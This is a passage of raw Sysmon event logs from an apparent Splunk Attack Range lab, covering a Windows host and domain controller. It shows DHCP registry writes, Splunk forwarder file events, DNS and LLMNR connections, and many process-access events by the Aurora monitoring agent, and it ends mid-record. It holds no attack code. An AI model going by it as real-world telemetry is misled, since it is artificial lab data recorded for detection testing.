12:17:16.421{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2942d033-154d-4e3a-b412-31d0a08fdcca}\LeaseObtainedTimeDWORD (0x63c7e34c) 13241300x800000000000000015140Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:17:16.421{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2942d033-154d-4e3a-b412-31d0a08fdcca}\LeaseDWORD (0x00000e10) 13241300x800000000000000015139Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:17:16.421{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2942d033-154d-4e3a-b412-31d0a08fdcca}\DhcpServer10.0.1.1 13241300x800000000000000015138Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:17:16.421{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2942d033-154d-4e3a-b412-31d0a08fdcca}\DhcpSubnetMask255.255.255.0 13241300x800000000000000015137Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:17:16.421{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2942d033-154d-4e3a-b412-31d0a08fdcca}\DhcpIPAddress10.0.1.15 13241300x800000000000000015136Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:17:16.421{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2942d033-154d-4e3a-b412-31d0a08fdcca}\DhcpInterfaceOptionsBinary Data 23542300x800000000000000015135Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:16.358{E5A8D418-DC43-63C7-1200-00000000B002}1012NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=F2EABC7A5B1B5D42369ACB8E1BEC83B4,SHA256=2187721FEC90464BC064CD06A5E6ECF4AFC30E31D464A494EF26E775B42D4DAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039884Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:17.519{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC3395AC5A6824505B4A2E37DA9B23A9,SHA256=F8EA40BDF797F476B57EDB7936D9634101A4834CE18262B3430690ED3BDCCC5E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015151Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:16.300{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal68bootpcfalse10.0.1.1ip-10-0-1-1.us-east-2.compute.internal67bootps 23542300x800000000000000015150Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:17.058{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83E17E21F760FB2D923B13E68D2B48E1,SHA256=7BFA1F1DE7C49609A2B603A13B51AF912470251EB24FC8E655E8C9587646BB63,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000039886Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:17.176{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-east-2.compute.internal49616- 23542300x800000000000000039885Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:18.591{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DC6210AAA2D2DA64ACFD6BBDCAD3799,SHA256=84DF5BDE69A143CD632E01A7C3913C5DB02DCABA18B32FC98567992DD81B00FD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015154Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:16.313{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:0:0:5891:e5bb:9da:ffff-59288-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x800000000000000015153Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:16.313{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:580:c047:29af:3818win-host-ctus-attack-range-933.us-east-2.compute.internal59288-trueff02:0:0:0:0:0:1:3-5355llmnr 23542300x800000000000000015152Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:18.153{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14F7201F3D062DACF061A62A88835F9A,SHA256=288F4E6F498FEFC85D9A52548AD22397E9DA48E1AC55C74CF0794B73FDB2DFAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039887Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:19.661{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A333F432362AEB4A1348F216A0C8CBFE,SHA256=1D46536E990FECAD7F62459235BA2514326FF4748651B781E6DCCC345ECB0A33,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015155Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:19.231{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2039EE3381E045A8592A4F1FEB3D15CB,SHA256=71D5163F82A2B860789882E6EB090102578F8DEBD6331FEF1A4F73C1D8AE07D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039888Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:20.755{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79C7786C73CA6CBB204D32E27422520A,SHA256=53C715E9DE7C23BAACA519E2DC7670B899011883948A6120F00039BFAFCA817B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015156Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:20.308{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F83F0629479B813AE9653A39A15A9A65,SHA256=1A94A25396BBC3F167EAB008CE9501AC3C5BA97AFD63B7728A39F9B05CFB6173,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039889Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:21.852{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=229DF8C4E46A22F51D6883DAAFF9BCF7,SHA256=F79648DA01676DD32853F83B5BA4B59A96184025FDC19B61D8E06281572557EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015158Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:20.063{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50041-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015157Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:21.398{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F11DB72E196B537B738E748B6ED4338,SHA256=ECB9BC120B825AF0D217BC6E9751C77AB38B2382BF9183D1832B54A425DAC55D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039890Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:22.923{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED6FE9E9CA6ED3986B1E78A62F62C58D,SHA256=1C029E7DD082FF2889D2DCDDFBFB6A0A86E76A4C791C2E4099EC8AFD03907B4B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000015190Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.770{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015189Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.767{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015188Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.767{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015187Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.763{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015186Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.759{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015185Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.757{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015184Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.755{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015183Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.751{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015182Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.749{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015181Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.744{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015180Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.743{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015179Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.735{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015178Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.731{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015177Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.730{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015176Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.722{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015175Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.721{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015174Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.712{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015173Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.709{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015172Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.682{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015171Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.673{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program 